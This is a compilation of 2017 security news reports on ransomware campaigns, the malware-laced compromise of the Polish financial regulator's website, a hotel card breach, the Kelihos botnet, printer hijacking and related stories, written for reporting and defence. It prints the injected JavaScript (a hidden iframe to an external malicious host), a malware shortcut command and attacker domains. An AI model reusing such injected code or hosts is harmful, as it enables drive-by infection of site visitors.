“Sage and Locky Ransomware Now Sharing Delivery Infrastructure in Phishing Attacks” titled a blog post published by Phishme.
The Sage ransomware was recently emerged, the malware researchers spotted in December 2016, it was spread through phishing messages using malicious attachments. Threat actors frequently changed tactic to elude spam filters, for example, they used in the recent campaigns random numbers in email subjects.
“Following this early distribution, threat actors moved toward the mainstream in a major way. The phishing email subjects used random numbers to help elude some basic filters and leveraged business-related themes rather than explicit or racy narratives. The body of these emails explained that a financial transaction had been rejected and claimed that details about the failure could be found an attached document.” reads the analysis published by Phishme.
Some of the distribution emails didn’t have a subject line and used recipient’s name as part of the attachment’s file name. The attachment is a double-zipped archive containing a malicious Office document or .js file that is used to launch the attack.
Some emails claimed to be containing information about a financial transaction that had been rejected, or that a deposit of a refund had been failed due to the cancellation of an order.
“In this more polished campaign, the .zip file (named “document_1.zip”) contained a JavaScript application which, when run, facilitated the download of a Windows executable representing the Sage Ransomware to be downloaded.” continues PhishMe.”In this case, the payload binary was retrieved from the domain affections[.]top, however the payment gateway’s Tor site, as well as the unusual Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com remained the same.”
Starting on January 26, 2017, the experts noticed a phishing campaign used to deliver the Locky ransomware with many similarities with a campaign used to spread the Sage ransomware. The researcher observed the use of the domain affections[.]top as part of the delivery infrastructure on Monday, January 30.
“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” continues PhishMe notes.
Researchers at Microsoft demonstrated on the past the link between Locky and Kovter threats, they detailed a technique adopted by crooks which first attempted to drop Locky ransomware, but that switched to Kovter malware in case of failure.
The distribution of both the two threats, Sage and Locky, from the same delivery infrastructure let the experts in to believe that operators were likely using a service offered in the criminal underground to spread the ransomware.
“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” added PhishMe.
Crooks hacked Polish banks with a malware planted on Government site
7.2.2017 securityaffairs Virus
Several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.
Polish banks are investigating a massive cyber attack after a malware was spotted on several servers of the financial institutions.
The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.
The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.
A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.
In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”
Polish banks malware
The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.
The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.
“It has been a busy week in SOCs all over the polish financial sector. At least a few of polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble.” reported the badcyber.com website “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”
According to first findings of the investigation, the KNF’s website had been compromised that had modified one of the site’s JavaScript files.
Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.
The injected JS file resulted in visitors to the KNF website loading an external JS file which then download the malware from an external server and installed it.
To unauthorized code was stored in the following file:
http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
and looked like that:
document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor
.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top
:0px;'></iframe></div>");
At the time I was writing, both the KNF and the Polish government confirmed that there is no indication that crooks have stolen money from the banks.
“Significantly, we do not have so far any information related to these attacks, successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money.” reported the local media zaufanatrzeciastrona.pl. “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but due to the fact that the data were prior to shipment by criminals encrypted, to determine what was stolen can be difficult.”
The unique certainly is that the incident could be considered to be the largest system hack of ever in the country’s financial sector.
The IOCs are available on the badcyber.com website.
Polish Banks Hacked using Malware Planted on their own Government Site
7.2.2017 thehackernews Crime
In what considered to be the largest system hack in the country's history and a massive attack on the financial sector, several banks in Poland have been infected with malware.
What's surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) -- which, ironically, is meant to keep an eye out for the safety and security of financial systems in Poland.
During the past week, the security teams at several unnamed Polish banks discovered malicious executables on the workstations of several banks.
The KNF confirmed that their internal systems had been compromised by someone "from another country," although no specifications were provided.
After downloads of suspicious files that were infecting various banking systems had been discovered on the regulator's servers, the KNF decided to take down its entire system "in order to secure evidence."
Here's what happened:
An unknown attacker compromised the KNF's website for well over a week by modifying one of the site's JavaScript files, making visitors to the regulator's site load the malicious JavaScript file, which then downloaded the malicious payloads.
Once downloaded and executed, the malware connected to some foreign servers to perform various malicious tasks such as reconnaissance, data exfiltration, and post exploitation.
This particular malware appears to be a new strain of nasty software which has never seen before in live attacks and has a zero detection rate on VirusTotal.
In some cases, the attackers even managed to gain control over critical servers within the targeted bank's infrastructures.
Security blogger BadCyber spoke to several banks, and some 20 commercial banks across Poland have already confirmed being victims of a malware infection while other banks keep looking.
The affected banks discovered the encrypted executable files on several servers and unusual network traffic going to uncommon IP addresses situated in other foreign countries.
Both the KNF and the Polish government confirmed local Polish media that the investigation is ongoing and that there is no indication of people's money being affected in the attack and no operations were affected.
US Judge Ordered Google to Hand Over Emails Stored On Foreign Servers to FBI
7.2.2017 thehackernews Security
In this world of global mass surveillance by not the only US, but also intelligence agencies across the world, every other country wants tech companies including Google, Apple, and Microsoft to set-up and maintain their servers in their country to keep their citizen data within boundaries.
Last year, Microsoft won a case which ruled that the US government cannot force tech companies to hand over their non-US customers' data stored on servers located in other countries to the FBI or any other federal authorities.
However, a new notable ruling just goes against the court judgment last year, raising concerns regarding people's privacy.
A US magistrate reportedly ruled Friday that Google has to comply with FBI search warrants seeking customer emails stored on servers outside of the United States, according to Reuters.
U.S. Magistrate Judge Thomas Rueter in Philadelphia noted that transferring emails from outside servers so FBI could read them locally as part of a domestic fraud probe didn't qualify as a seizure because there's "no meaningful interference" with the account holder's "possessory interest" in the data sought.
Here's what Judge Rueter says:
"Google regularly transfers user data from one data center to another without the customer's knowledge. Such transfers do not interfere with the customer’s access or possessory interest in the user data. Even if the transfer interferes with the account owner's control over his information, this interference is de minimis [minimal] and temporary."
In August 2016, the search engine giant was ordered to comply with two FBI search warrants related to criminal investigations, but Google provided only the data stored on its US servers.
So, the government filed a motion to compel Google to hand over the rest of the information to the FBI.
When the company referred to the last year's ruling in favor of Microsoft by the US Court of Appeals for the Second Circuit in a similar case, the judge said Google was found processing its foreign-stored data in a way that made it impossible for the US government to ask a foreign state for legal assistance.
However, Google made it clear that a search warrant, if granted, can give the government access to email content, while subpoenas and court orders only let them access non-content data, like an account creation number, phone number, and sign-in IP address.
According to the new ruling, the search engine giant receives over 25,000 requests every year from United States authorities for disclosures of user data in criminal matters.
Google is obviously unhappy with the result and intends to fight it back.
Carbon Black Unveils "Streaming Prevention" to Thwart Attacks in Progress
7.2.2017 securityweek Virus
New Streaming Prevention Technology Collects, Correlates and Analyzes Endpoint Events in Real-time to Detect and Stop Attacks In Progress
Malicious attacks are increasingly leveraging non-malware methodologies. Already, 53% of attacks do not use malware; and it is estimated that over the next 90 days, one-third of organizations will face a non-malware attack. It is claimed that these attacks will likely succeed because current AV technology, whether first-gen or second-gen machine learning technology, is focused almost entirely on detecting a malicious file dropped on the endpoint.
To combat this new attack vector, Carbon Black has today announced its new Streaming Prevention technology. Carbon Black CTO Mike Viscuso talked to SecurityWeek to explain why this new approach is necessary, and how it works.
Carbon Black logoViscuso described standard AV as 'point-in-time' prevention; and illustrated it with an example from the NSA. Since the NSA is offensive as well as defensive, it checks its own tools against standard defenses. When a new McAfee product was launched, it was tested against NSA tools -- and it succeeded in blocking one of them. This tool spun up a command shell that could be used remotely. To get by it, the NSA operatives simply renamed the command shell to something else; and it worked.
The point, explained Viscuso, is that most anti-malware products look for 'points', usually files. They do not look for behavior in context. If the attacker does not drop a file that can be analyzed, or if it involves something not recognized by the defense, it is simply allowed. "Many of the big breaches in recent years, Yahoo, Oracle and DNC, for example, all resulted from a non-malware attack."
This new attack approach leverages the existing power of the operating system. It uses trusted OS tools such as PowerShell and WMI to do the work. He gave an example: "A compromised website could require Flash. Flash could be exploited to run PowerShell. PowerShell would conduct the attack." There is, he says, nothing in this process for contemporary anti-malware products to detect and prevent.
"Anti-malware products," he explained, "are very focused on malicious software; that is, malware. When a new file gets put onto your system, anti-malware will scan it to determine whether it thinks it is malicious or not. It is very point-in-time. But the reality is that attackers are increasingly not using malware. They've got much more sophisticated -- but so has technology. We're leveraging new technology that has been very successful in other industries -- called event stream processing -- to look at the full history of what this system or process or set of processes has been doing."
Carbon Black's Streaming Prevention has grown out of the event stream processing developed for algorithmic trading. A simple algorithm could tell a trader to buy a particular stock at one price and to sell at another price. But if the entire market is moving, those point-in-time instructions could be bad advice. What is necessary for the algorithm is a deeper understanding of the entire market.
"It needs more data," said Viscuso. "So, a technology called event stream processing was developed which allowed the consumption of millions and millions of data points, and had the ability to analyze them very rapidly in order to make the right decision; and to further allow the algorithm to update itself, in milliseconds, over and over again in a loop, so that it can make better and better decisions over time."
This, he said, is the basis of Streaming Prevention. It applies machine learning and network anomaly techniques to the endpoint. It examines and tags TTPs (tactics, techniques and procedures) used in malicious activities, and analyzes them in context. "It is continuously learning from what it sees, and has seen in the past, when a certain sequence of events could lead to a breach. It can then apply a risk decision on that sequence of events to determine whether it is an attack or not. Over time, this risk decision gets more and more accurate and perceptive; and over time it will learn how to prevent all non-malware attacks."
Streaming Prevention is a cloud service. The analysis is conducted in the cloud and the result of the analyses pushed down to the endpoint so the endpoint acts independently. But data is gathered from all client endpoints and streamed up to the cloud. "The results are then shared with all customers so they are protected against local attacks and also new attacks happening elsewhere." Endpoints, he added, can now be protected against both malware and non-malware attacks.
In October 2016, Carbon Black announced a partnership with IBM Security that will allow Carbon Black endpoint threat data to feed into IBM's BigFix for instant attack remediation.
As a company, Carbon Black has more than 600 employees and is a result of Bit9 merging with Carbon Black in February 2014. In October 2016, The Wall Street Journal reported that Carbon Black has made a confidential IPO filing under the JOBS Act.
InterContinental Confirms Card Breach at 12 Hotels
7.2.2017 securityweek Crime
British multinational hotel company InterContinental Hotels Group (IHG) confirmed on Friday that systems processing payments for some of its properties in the Americas region have been breached by cybercriminals.
The company launched an investigation in late December, following reports of a fraud pattern on credit and debit cards used at some of its hotels, particularly ones operating under the Holiday Inn and Holiday Inn Express brands.
Cyber security firms investigating the incident found malware on servers that processed payment cards at the bars and restaurants of 12 properties managed by IHG. Cards used at front desks are not affected.
The malware infected servers between August and December 2016, and it was designed to steal track data (i.e. cardholder name, card number, expiration date and verification code) as it passed through the compromised system. The company has not provided any information about the number of affected cards.
The list of impacted hotels includes Crowne Plaza San Jose-Silicon Valley, Holiday Inn San Francisco Fisherman’s Wharf, InterContinental Los Angeles Century City, InterContinental Mark Hopkins in San Francisco, InterContinental San Francisco, InterContinental Buckhead Atlanta, InterContinental Chicago Magnificent Mile, InterContinental The Willard in Washington D.C., Holiday Inn Nashville Airport, Holiday Inn Resort in Aruba, InterContinental Toronto Yorkville in Canada, and InterContinental San Juan Resort & Casino in Puerto Rico.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG told customers. “We have also notified law enforcement and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring on the affected cards.”
IHG hotels were affected by at least two other data breaches last year. Kimpton Hotels & Restaurants informed customers in August that hackers had access to its payment systems between February and July, and InterContinental hotels were also involved in an incident that impacted HEI Hotels & Resorts.
The list of other hotel chains that suffered a data breach recently also includes Noodles & Company, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.
Kelihos Spreads via USB Drives
7.2.2017 securityweek Virus
Kelihos, the malware behind one of the longest standing botnets out there, was recently observed spreading via infected thumb drives, researchers have discovered.
The Kelihos botnet has been around for many years, and even survived takedown attempts over half a decade ago. Last year, the botnet’s activity ramped up as tens of thousands of new bots were added to it. Kelihos was being used for the distribution of MarsJoke, Wildfire, and Troldesh ransomware and various Trojans, including Panda Zeus, Nymain and Kronos.
The botnet is being rented as part of the “spam as a service” business model and continues to be geo-targeting users. The latest campaign targeted users in Canada with links to web pages of Tangerine Bank phish websites, while distributing a link to the Ecstasy website to recipients with “.kz” email addresses, Arsh Arora, malware analyst and Ph.D. researcher at The University of Alabama at Birmingham, discovered.
The emails contain a webpage that attempts to trick the user into clicking a button with the subject line of “TANGERINE online account has been suspended” (where Tangerine is the Internet/telephone base bank formerly known as ING Direct). An HTML version of the page is displayed to the potential victims, encouraging them to click on a “Learn More” button, which would take them to a phishing site, in an attempt to steal their credentials by requesting them to verify their information.
The geo-tagging of addresses ending with “.kz” is something new for the Kelihos botnet, the security researcher notes. The spam message, which featured a subject line in Russian, was directing users to an adult site (www[dot]almatinki[dot]com).
The most interesting part of the attack, however, is the fact that the removable drives attached to the compromised machines would be infected with a copy of the original Kelihos binary. The security researcher says that the malware was written to a thumb drive connected to the virtual machine that was infected as part of the new campaign.
Saved on the thumb drive under the name of “porn.exe,” the executable is hidden from the user, the same as a few shortcuts that were not present on the removable device before. The file, the security researcher says, is the Kelihos botnet.
The researcher also discovered that the Create File function was linked to the dropped executable. The malware attempts to open several files with CreateFile and, if it fails, it then reverts to creating the .exe file, after which it writes the malicious binary to this file. Next, the malware creates shortcuts for the hidden directories and executables.
“An Autorun.inf is not created to run this file, however, a shortcut to the file with the command C:\WINDOWS\system32\cmd.exe F/c ‘start %cd%\porn.exe’ can be found on the drive, as well as shortcut to several other hidden directories on the drive (not malicious),” the security researcher says.
When the executable runs, it behaves just like a normal Kelihos would, though the researcher says that they weren’t yet able to infect a new drive with the botnet, meaning that further investigation is required to reveal the specific mechanism the malware uses for infection, especially with the executable seemingly identical to the original binary.
Android Ransomware Uses Dropper to Increase Effectiveness
7.2.2017 securityweek Virus
The use of droppers to infect devices with ransomware has spread to Android, Symantec security researchers warn.
The use of a dropper to deliver malware on Android is a new technique, although it is a very popular one when it comes to malware for desktop computers. Furthermore, researchers say, the actors using it have also implemented a 2D barcode technique meant to help them receive payment from victims, but they did this ineffectively.
Spotted about a year ago, the Lockdroid ransomware was designed to encrypt user files and perform other nefarious activities as well. It requests device admin rights and, if the user grants them, it can also lock devices, prevent the user from uninstalling it using the user interface (UI) or the command line interface, and can even force factory resets, thus erasing all user data from the device.
The malware designed to drop the Android.Lockdroid.E ransomware is being distributed via third-party apps, but also through text messages and forum posts. The malware first attempts to drop a version of itself only onto rooted devices, or locks those devices that haven’t been rooted, Symantec discovered.
Once installed on a device, the malicious app checks to see whether the device has been rooted and requests root access permissions if it has. The malware claims that this would allow it to access thousands of adult movies for free, in an effort to convince potential victims of the necessity of these permissions.
Once the user agrees, the malware drops a copy of itself onto the device, by remounting the /system partition, copying the embedded APK file for Android.Lockdroid.E to /system/app/[THREAT NAME].apk, changing the dropped APK file's permission to executable, and rebooting the device so the threat can run on boot completed as a system application.
After the reboot, the threat is difficult to uninstall from the infected devices, because it has become a system application. After the installation process has been completed, Android.Lockdroid.E locks the device and displays the ransom screen and 2D barcode.
On unrooted devices, the ransomware immediately locks the device and displays the ransom screen and barcode. In such cases, however, the malware does not drop anything onto the compromised device. According to Symantec, the ransom demanded by this Trojan is rather difficult to pay.
“The instructions ask the user to scan the barcode to log in to a messaging app to pay the ransom. While this may seem like a good idea to have victims pay the ransom for their device, it is ineffective in practice. There is no way to scan the barcode or log in to the messaging app from the compromised device, so the barcode must be scanned from a second device. This makes it more difficult for the victim to pay their ransom and for the attacker to receive payment,” the security researchers say.
A Hacker hijacked over 150,000 Printers publicly exposed online
7.2.2017 securityaffairs Hacking
A hacker hijacked over 150,000 Printers publicly exposed online to warn owners of cyber attacks.
Recently a group of researchers from the University Alliance Ruhr has found a cross-site printing bug in the old PostScript language. Popular printer models manufactured by Dell, Brother, Konica, Samsung, HP, and Lexmark are affected by security vulnerabilities that could be exploited by hackers to steal passwords, steal information from the print jobs, and shut down the devices.
Following the above research, a hacker with the online moniker Stackoverflowin decided to hack thousands of publicly exposed printers and to print rogue messages, including ASCII art depicting robots and warned that the printers had been hacked and they were part of a botnet.
The hacker said he wants to raise awareness about the risks of cyber attacks on printers exposed to the internet.
“A grey-hat hacker going by the name of Stackoverflowin says he’s pwned over 150,000 printers that have been left accessible online.” reads a blog post published by Bleeping Computer.
“Speaking to Bleeping Computer, the hacker says he wanted to raise everyone’s awareness towards the dangers of leaving printers exposed online without a firewall or other security settings enabled”
Stackoverflowin claims to be a British high-school student who is a passionate security researcher, he explained that he simply sent print jobs using the Line Printer Daemon (LPD), the Internet Printing Protocol (IPP) and the RAW protocol on communications port 9100 to printer models that were exposed on the internet without any authentication.
Stackoverflowin did much more, he also exploited an undisclosed remote command execution (RCE) vulnerability in the web management interface of Xerox devices.
The young hacker estimated that he compromised up to 150,000 printers, but he also added to have access to more RCE vulnerabilities which would have allowed him to access more than 300,000 printers.
Stackoverflowin wrote an automated script which scans the Internet for open printer ports and sends a rogue print job to the device.
Follow
Remigio Isla @lttle_wolf
@lmaostack LMAO! <3 can u send someone of Tweety? on my country we love tweety LOL 😂
4:40 PM - 4 Feb 2017
8 8 Retweets 10 10 likes
Below the latest version of the message sent to the printers:
stackoverflowin the hacker god has returned, your printer is part of a flaming botnet, operating on putin's forehead utilising BTI's (break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Many users on Twitter shared images of the rogue messages sent on Friday to their printers.
The case demonstrates the importance to adopt necessary measures to protect devices exposed online, for example enforcing access rules in the routers, setting up a VPN or allowing the access from certain IPaddresses.
Danger přestává strašit, nebezpečný virus je na ústupu
6.2.2017 Novinky/Bezpečnost Viry
Škodlivý kód Danger byl hned několik měsíců v minulém roce nejrozšířenější hrozbou kolující na internetu. V současnosti je však na ústupu, jeho podíl v lednu výrazně klesl. Vyplývá to ze statistik antivirové společnosti Eset.
Hned na úvod se sluší podotknout, že i v lednu byl Danger nejrozšířenější hrozbou vůbec. Jeho podíl však dramaticky klesl meziměsíčně o více než 30 procentních bodů na 11,05 %. Právě to ukazuje, že je tento nezvaný návštěvník na ústupu.
Nebezpečný virus, plným názvem JS/Danger.ScriptAttachment, je velmi nebezpečný. Otevírá totiž zadní vrátka do operačního systému. Útočníci pak díky němu mohou propašovat do napadeného počítače další škodlivé kódy, nejčastěji tak šíří vyděračské viry z rodiny ransomware.
Zašifrují uložená data
Tyto škodlivé kódy začnou šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit, jinak se ke svým datům údajně již nikdy nedostane.
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.
„Pokles podílu downloaderu Danger je opravdu významný. V prosinci představoval téměř každou druhou zaznamenanou hrozbu, v lednu jen každou desátou. Zjistili jsme však významný nárůst výskytu různých typů malware rodiny TrojanDownloader,“ řekl Miroslav Dvořák, technický ředitel společnosti Eset.
Stahuje další škodlivé kódy
Tento malware přitom dokáže v počítači nadělat také velmi pěknou neplechu. „Stejně jako v případě Dangeru jde, ostatně jak už sám název napovídá, o kód snažící do napadeného zařízení nahrát další škodlivé kódy,“ podotkl Dvořák.
TrojanDownloader – konkrétně jeho verze Agent.CHO – byl druhou nejrozšířenější hrozbou s podílem 5,03 %. První pětku pak uzavírají škodlivé kódy ProxyChanger a Nemucod.
Přehled deseti nejrozšířenějších hrozeb za měsíc leden naleznete v tabulce níže:
Top 10 hrozeb v České republice za leden 2017
1. JS/Danger.ScriptAttachment (11,05 %)
2. VBA/TrojanDownloader.Agent.CHO (5,03 %)
3. JS/ProxyChanger (4,36 %)
4. JS/TrojanDownloader.Nemucod (4,12 %)
5. JS/Kryptik.RE (3,38 %)
6. VBA/TrojanDownloader.Agent.CIY (2,55 %)
7. VBA/TrojanDownloader.Agent.CIQ (2,04 %)
8. Java/Adwind (2,01 %)
9. JS/TrojanDownloader.Iframe (1,73 %)
10. PowerShell/TrojanDownloader.Agent.DV (1,58 %)
Zdroj: Eset
Locky, Sage Ransomware Share Distribution Infrastructure
6.2.2017 securityweek Virus
Locky ransomware was recently observed being distributed using the same delivery infrastructure previously used to spread the Sage ransomware, PhishMe security researchers warn.
It’s not uncommon for cybercriminals to share infrastructure, so the reuse of the same resources to drop both Sage and Locky isn’t surprising. However, the discovery does show that Locky’s operators are working on securing new distribution venues, after the Necurs botnet, the main Locky distributor, went silent recently.
The Sage ransomware emerged on the threat landscape at the end of 2016 and was detailed early this year. The first delivery emails employed explicit or racy narratives to trick users into opening malicious attachments, but the actors then moved to business-related themes and started using random numbers in email subjects to elude some basic spam filters.
Some of the distribution emails didn’t have a subject line at all, but featured recipient’s name as part of the attachment's file name, which was usually a double-zipped archive containing a malicious Office document or .js file. Other emails claimed to be containing information about a financial transaction that had been rejected, or that a deposit of a refund had been failed after an order had been canceled.
According to PhishMe, the campaign they analyzed leveraged a .zip file (named “document_1.zip”) with a JavaScript application inside, meant to download the Sage ransomware in the form of a Windows executable. The payload was retrieved from the domain affections[.]top, and the malware leveraged the same payment gateway’s Tor site as before, as well as the Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com.
Starting on January 26, 2017, however, a phishing campaign used to deliver the Locky ransomware was observed using the very same email narratives and metadata. Furthermore, the domain affections[.]top was being used as part of the delivery process for this ransomware family on Monday, January 30.
“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes. The relation between Locky and Kovter has been detailed a few times lately, most recently by Microsoft, which stumbled upon a two-step delivery technique which attempted to drop Locky first, but switched to Kovter if that failed.
The overlapping infrastructure also demonstrates once again how cybercriminals frequently reuse malware support and distribution infrastructure. The distribution of both Sage and Locky from the same location can be seen as evidence of the commodity status for ransomware tools like these. Both malware variants being distributed using these attributes and infrastructure enjoy equal effectiveness, but this also provides researchers and security professionals with a few avenues for mitigating them.
“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” PhishMe notes.
Many Darknet Sites Defaced in "Freedom Hosting II" Hack
6.2.2017 securityweek Hacking
Thousands of Tor-based websites became inaccessible last week after hackers breached the systems of Freedom Hosting II, a service provider that is believed to host roughly 20 percent of the sites on the dark web.
While Freedom Hosting II has hosted nearly 11,000 websites, an analysis conducted by privacy and anonymity researcher Sarah Jamie Lewis has shown that only 1,500 - 2,500 of them had any content.
Hackers affiliated with the Anonymous hacktivist movement said more than half of the websites hosted by Freedom Hosting II contained child pornography, despite the provider’s claims that it does not tolerate this type of content.
As a result, the hackers defaced all the sites hosted by Freedom Hosting and leaked data taken from its systems. The hackers also provided information on how they managed to breach the organization’s systems.
Users who attempted to access the websites were shown a message that started with, “Hello Freedom Hosting II, you have been hacked.” The Verge reported that the hackers initially offered to sell the stolen data for 0.1 bitcoin (roughly $100), but later apparently decided to make it available for free. The address provided by the attackers has received a total of 0.12 bitcoins.
13h
Sarah Jamie Lewis @SarahJamieLewis
I've spent some time on the data now & I plan on writing much more about it in the future. But I'm gonna lay out my current thoughts.
Follow
Sarah Jamie Lewis @SarahJamieLewis
First off, as I commented on Friday, this is a huge event. I think this will likely be seen as a milestone in the history of anonymity tech.
2:53 AM - 6 Feb 2017
Retweets 4 4 likes
13h
Sarah Jamie Lewis @SarahJamieLewis
As an analogy: it's like someone taking down geocities in the late 90s... Sure there was lots of crap, but also lots of diverse content.
Follow
Sarah Jamie Lewis @SarahJamieLewis
FHII made it easy for people to start playing with anonymous publishing - and in doing so created a huge vulnerability.
3:03 AM - 6 Feb 2017
Retweets 2 2 likes
Australian security expert Troy Hunt, the owner of the Have I Been Pwned breach notification service, analyzed the leaked data and discovered a 2.2 Gb database containing more than 380,000 user records, including email addresses, usernames and passwords.
Hunt believes law enforcement agencies will find the leaked data very useful, especially since it includes real email addresses. He also pointed out that many of the addresses are on .gov domains, but it’s unclear how many of them are real and what they have been used for.
The leaked data was also analyzed by Chris Monteiro, who confirmed that Freedom Hosting II hosted some large English and Russian-language forums related to child abuse. The researcher also identified fraud, account hacking, fetish and botnet websites.
The original Freedom Hosting was taken down by the FBI back in 2013. Before shutting it down, the agency exploited a vulnerability to identify darknet users.
ENISA Report Provides ICS-SCADA Protection Recommendations
6.2.2017 securityweek Safety
ENISA Publishes "Communication Network Dependencies for ICS-SCADA Systems" Report for Critical Infrastructure Protection
The clear emergence of cyber weapons used for political interference -- cyber espionage such as the OPM breach probably related to China; political manipulation such as the breach and leaks relating to the DNC by Russia; and physical damage such as the Ukraine power outages by Russia or its supporters -- has focused attention on the security of the critical national infrastructures. Much of that infrastructure is controlled and operated by ICS/SCADA systems.
The European Union Agency for Network and Information Security (ENISA) has published a new analysis and recommendations on 'Communication network dependencies for ICS/SCADA Systems' (PDF). The report concentrates on two of the primary causes of security concern: network segmentation and communication between the segments; and the wider issue of communications with the outside world that often uses the Internet.
The report was compiled from an analysis of stakeholder conversations with members of the ENISA ICS and SCADA groups together with data from official sources and other ICS/SCADA experts in the field. It highlights three primary causes for concern, and makes eight specific security recommendations for its target audience of asset owners and operators of electricity, oil, gas, transport, health, water supply, and the manufacturing industry.
The three worrying attack scenarios are remote compromise allowing an attacker to take control of one or multiple assets within the network; the insider threat from a disgruntled employee, contractor or third-party staff with in-depth knowledge of the infrastructure; and the risk of infection during the maintenance or upgrade process. Associated with the third concern is the website where the update files and firmware are located.
Related: Learn More at SecurityWeek's ICS Cyber Security Conference
The report examines ICS/SCADA communication networks and their interdependencies, and examines the threats, vulnerabilities, incidents and attacks affecting those networks while focusing on those that might result in cascading effects. It also presents a gap analysis to highlight areas that require further work.
A section on security good practices outlines the necessary steps in first understanding and then protecting the network. This includes a list of technology and processes that can "greatly increase the protection of the availability, integrity, confidentiality and non-repudiation" of the network and its communications.
Finally, it presents a list of eight "high-level recommendations for manufacturers, operators and security experts that will help them to improve the security level and resilience of the ICS/SCADA systems and communication network functions." These are:
1. Include security as a main consideration during the design phase of ICS SCADA systems.
2. Identify and establish roles of people operating in ICS/SCADA systems.
3. Define network communication technologies and architecture with interoperability in mind.
4. Establish brainstorming and communication channels for the different participants on the lifecycle of the devices to exchange needs and solutions.
5. Include the periodic ICS/SCADA device update process as part of the main operations of the systems.
6. Establish periodic ICS/SCADA security training and awareness campaign within the organization.
7. Promote increased collaboration amongst policy decision makers, manufacturers and operators at EU Level.
8. Define guidelines for the establishment of reliable and appropriate cybersecurity insurance requirements.
These recommendations, modified where necessary, would make part of good practice for any industry. The ENISA report goes further to focus their particular relevance to operational technology. For example, for the first 'security by design' recommendation, it explains that, "Traditionally, only safety is included as one of the main considerations during the design of an ICS/SCADA system or infrastructure (alongside efficiency, real-time constraints, etc.). However, the concept of security is not, although it is now one of the main risk sources that should be covered to prevent future attacks and incidents."
While users have little control over ICS/SCADA development and manufacturing processes, ENISA recommends that "during the design phase, the security of the devices, and the communications between them, has to be one of the main concepts that will impact on the choice of devices, measures to implement, and overall design of the architecture."
As a result of this process, writes ENISA, "the systems' security is increased as many threats have been mitigated. This can be measured via risk assessment, vulnerability assessment or penetration test."
This basic structure is repeated for each of the recommendations: a description of the issue, action required, and effect of implementation. The result is a thorough examination of the ICS/SCADA security landscape together with practical steps to improve the security posture of the critical national infrastructure.
Microsoft Windows DRM issue could be exploited to uncloak Tor Browser users
6.2.2017 securityaffairs Exploit
HackerHouse researchers have discovered that media content protected by Digital Rights Management (DRM) can be used to uncloak Windows Tor Browser users.
The anonymity of the Tor users is threatened by a new issue related the Microsoft’s DRM. Windows users running the Tor browser can be de-anonymized with a trick based on the Microsoft DRM (Digital Rights Management) mechanism.
The discovery was made by researchers at Hacker House while they were conducting a study on social engineering attacks made by using a content protected with DRM.
Tor users can be unmasked by clicking on a media file revealing the user’s real IP address.
“DRM is a licensing technology that attempts to prevent unauthorised distribution and restrictive use of a media file. It works by encrypting the video and audio streams with an encryption key and requesting a license (decryption key) from a network server when the file is accessed. As it requires network connectivity it can cause users to make network requests without consent when opening a media file such as a video file or audio file. WMV is using Microsoft Advanced Systems Format (ASF) to store audio and video as objects. This file format consists of objects that are labelled by GUID and packed together to make a media package.” reads the analysis published on myhackerhouse.com.
Simplifying the problem, DRM-protected content has to fetch a license key from a server in order to be displayed. Windows raises a dialogue to the user is the content If isn’t signed properly.
Windows DRM Tor
“However, this warning DOES NOT appear if the DRM license has been signed correctly and the Digital Signature Object, Content Encryption Object and Extended Content Encryption Object contain the appropriate cryptographic signing performed by an authorised Microsoft License Server profile”
Windows DRM Tor
Researchers at Hacker House highlighted that Microsoft requests an expensive fee to users that want to sign media.
“DRM is expensive business and unless you use the SDK to develop your own application you will likely need to make use of a license provider to encrypt your WMV files using these tools and also for signing purposes. If you want to build your own Microsoft DRM signing solution the price-tag is around $10,000.” states Hacker House.
The experts have discovered online serviced managing to generate signed content avoiding a so expensive payment. These Windows DRM providers that could be used to sign user media can decloak Tor users.
